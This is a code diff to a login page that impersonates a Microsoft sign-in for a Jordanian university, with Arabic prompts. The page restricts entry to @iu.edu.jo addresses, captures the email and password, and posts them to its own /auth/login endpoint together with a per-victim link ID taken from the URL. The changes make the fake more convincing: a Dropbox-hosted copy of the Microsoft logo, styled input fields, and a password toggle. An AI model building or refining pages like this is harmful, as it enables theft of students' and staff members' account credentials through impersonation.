--- a/public/login.html
+++ b/public/login.html
@@ -22,23 +22,37 @@
       text-align: center;
     }
     .login-box img {
-      width: 100px;
+      width: 80px;
       margin-bottom: 20px;
     }
     .login-box h2 {
       margin-bottom: 20px;
       color: #333;
       font-size: 18px;
+      line-height: 1.4;
+    }
+    .input-group {
+      position: relative;
+      margin: 10px 0;
+      text-align: left;
     }
     .form-control {
       width: 100%;
-      padding: 12px;
-      margin: 10px 0;
+      padding: 12px 45px 12px 12px;
       border: 1px solid #ccc;
       border-radius: 4px;
-      box-sizing: border-box;
-      text-align: left;
+      font-size: 14px;
       direction: ltr;
+      box-sizing: border-box;
+    }
+    .input-icon {
+      position: absolute;
+      top: 50%;
+      right: 10px;
+      transform: translateY(-50%);
+      color: #666;
+      font-size: 18px;
+      pointer-events: none;
     }
     .btn {
       background: #0067b8;
@@ -63,23 +77,37 @@
     .footer-link:hover {
       text-decoration: underline;
     }
+    .error-msg {
+      color: #a80000;
+      font-size: 13px;
+      text-align: left;
+      margin-top: 5px;
+      display: none;
+    }
   </style>
 </head>
 <body>
   <div class="login-box">
-    <img src="https://logincdn.msftauth.net/shared/5/images/microsoft_logo.svg" alt="Microsoft Logo">
-    <h2>تسجيل الدخول بإستخدام بريدك الجامعي</h2>
+    <img src="https://www.dropbox.com/scl/fi/e7adn2nk9mfef0q1akjs2/Microsoft_logo_-2012.svg?rlkey=35k2k9o7d9r223b16yy7lybfd&dl=1" alt="Microsoft Logo">
+    <h2 id="title">تسجيل الدخول باستخدام بريدك الجامعي</h2>
     
-    <!-- الخطوة الأولى: البريد -->
+    <!-- خطوة إدخال البريد -->
     <div id="step-email">
-      <input type="email" id="email" class="form-control" placeholder="البريد الإلكتروني" required>
+      <div class="input-group">
+        <input type="email" id="email" class="form-control" placeholder="البريد الإلكتروني" required>
+        <span class="input-icon">@</span>
+      </div>
+      <div id="emailError" class="error-msg">❌ يجب إدخال بريد ينتهي بـ @iu.edu.jo</div>
       <button class="btn" onclick="validateEmail()">التالي</button>
     </div>
-
-    <!-- الخطوة الثانية: كلمة المرور -->
+    
+    <!-- خطوة إدخال كلمة المرور -->
     <form id="step-password" action="/auth/login" method="POST" style="display:none;">
-      <input type="hidden" name="email" id="hiddenEmail">
-      <input type="password" name="password" class="form-control" placeholder="كلمة المرور" required>
+      <div class="input-group">
+        <input type="password" id="password" name="password" class="form-control" placeholder="كلمة المرور" required>
+        <span class="input-icon" onclick="togglePassword()">👁</span>
+      </div>
+      <input type="hidden" id="hiddenEmail" name="email">
       <input type="hidden" id="linkId" name="id">
       <button type="submit" class="btn">تسجيل الدخول</button>
       <a href="#" class="footer-link">هل نسيت كلمة المرور؟</a>
@@ -87,23 +115,31 @@
   </div>
 
   <script>
-    // حفظ id في hidden field
+    // تمرير ID الرابط ليصل للنموذج
     const params = new URLSearchParams(window.location.search);
     const linkId = params.get('id');
     if (linkId) {
       document.getElementById('linkId').value = linkId;
     }
 
-    // التحقق من البريد
     function validateEmail() {
-      const email = document.getElementById('email').value.trim();
+      const emailInput = document.getElementById('email');
+      const email = emailInput.value.trim();
+      const errorDiv = document.getElementById('emailError');
       if (email.endsWith('@iu.edu.jo')) {
         document.getElementById('hiddenEmail').value = email;
         document.getElementById('step-email').style.display = 'none';
         document.getElementById('step-password').style.display = 'block';
+        document.getElementById('title').innerText = email;
+        errorDiv.style.display = 'none';
       } else {
-        alert('❌ يجب إدخال بريد ينتهي بـ @iu.edu.jo');
+        errorDiv.style.display = 'block';
       }
+    }
+
+    function togglePassword() {
+      const p = document.getElementById('password');
+      p.type = p.type === 'password' ? 'text' : 'password';
     }
   </script>
 </body>
